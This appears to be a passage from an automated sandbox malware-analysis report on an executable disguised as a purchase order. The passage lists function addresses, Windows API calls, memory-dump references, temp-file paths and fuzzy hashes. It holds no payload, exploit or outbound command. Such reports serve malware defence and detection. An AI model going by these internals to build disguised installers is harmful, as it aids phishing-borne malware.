                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$@y
                                                                      • API String ID: 3540041739-3020698753
                                                                      • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                      • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                      • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                      • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                      Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                      • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                      • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                      • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                      Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A9B
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                      • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                      • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                      • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                      Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                      • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                      • Opcode Fuzzy Hash: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                      • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                      Function 00403951 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowTextA.USER32(00000000,Regangen Setup), ref: 004039E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$1033$Regangen Setup
                                                                      • API String ID: 530164218-1124990733
                                                                      • Opcode ID: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                      • Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
                                                                      • Opcode Fuzzy Hash: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                      • Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98
                                                                      Function 0040586C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Regangen Setup,NSIS Error), ref: 00405D19
                                                                        • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058BF
                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 004058CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 3248276644-2648826227
                                                                      • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                      • Instruction ID: 819bf3b96d2f33be72422b420245a44e5a303c51be7f34a106cb995fc7f4ae7e
                                                                      • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                      • Instruction Fuzzy Hash: B7F0CD27115D5119E61632361C05ABF1A58CE82364718C53FFC51F22D1EA3C8862DD7E
                                                                      Function 0040577E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405784
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040578D
                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 0040579E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-4083868402
                                                                      • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction ID: 68e0f27090206f37803ec84d28e37c7f09ebc5753c251fe5cd2e9e8878fbe2c1
                                                                      • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction Fuzzy Hash: 44D0A972606A307AE2022A15AC09E8F2A08CF62301B044433F200B22A2C63C4E418BFE
                                                                      Function 00405817 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                      • CharNextA.USER32(00000000), ref: 0040582A
                                                                      • CharNextA.USER32(00000000), ref: 0040583E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsq8002.tmp, xrefs: 00405818
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 3213498283-2063696683
                                                                      • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                      • Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
                                                                      • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                      • Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A
                                                                      Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                      • GetTickCount.KERNEL32 ref: 00402C33
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                      • Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
                                                                      • Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                      • Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD
                                                                      Function 00404E99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                        • Part of subcall function 00403F3D: SendMessageA.USER32(00010426,00000000,00000000,00000000), ref: 00403F4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                      • Instruction ID: 1c3aa9a2031039442b6cd3bdc360fce63fd7b644e996c38402bdeea248e73ffc
                                                                      • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                      • Instruction Fuzzy Hash: 2D0171B1104249AFDF219F51DC80A5B3A25E7C4755F104037FB00762D1D33AAD619B6E
                                                                      Function 004035F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
                                                                      • GlobalFree.KERNEL32(00B719E8), ref: 00403618
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004035F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-4083868402
                                                                      • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
